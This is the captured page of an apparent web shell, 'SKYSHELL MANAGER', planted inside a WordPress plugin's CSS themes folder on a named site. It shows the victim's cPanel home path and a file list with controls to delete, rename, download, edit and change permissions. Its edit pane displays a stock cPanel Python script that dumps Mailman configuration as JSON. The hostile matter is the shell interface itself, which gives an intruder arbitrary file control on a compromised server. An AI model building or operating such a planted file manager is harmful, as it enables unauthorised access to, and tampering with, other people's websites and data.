📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-content
/
plugins
/
loginpress
/
css
/
themes
/
Name
Size
Perm
Actions
📄
error_log
314.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: dump_cpanel_mailmancfg_as_json
#!/usr/bin/python3 # cpanel - bin/dump_cpanel_mailmancfg_as_json Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited import sys sys.path.insert(0, '/usr/local/cpanel/lib/python3') import cPanel MAX_PICKLE_FILE_SIZE = 128 * 1024 * 1024 def main(argv): if len(argv) < 3: print('usage: dump_cpanel_mailmancfg_as_json <file,file,file,....> <sysuser>') return 1 filename = argv[1] sysuser = argv[2] print(cPanel.export_cpanel_pickle_keys_as_json(filename, sysuser, MAX_PICKLE_FILE_SIZE)) if __name__ == '__main__': raise SystemExit(main(sys.argv))
Save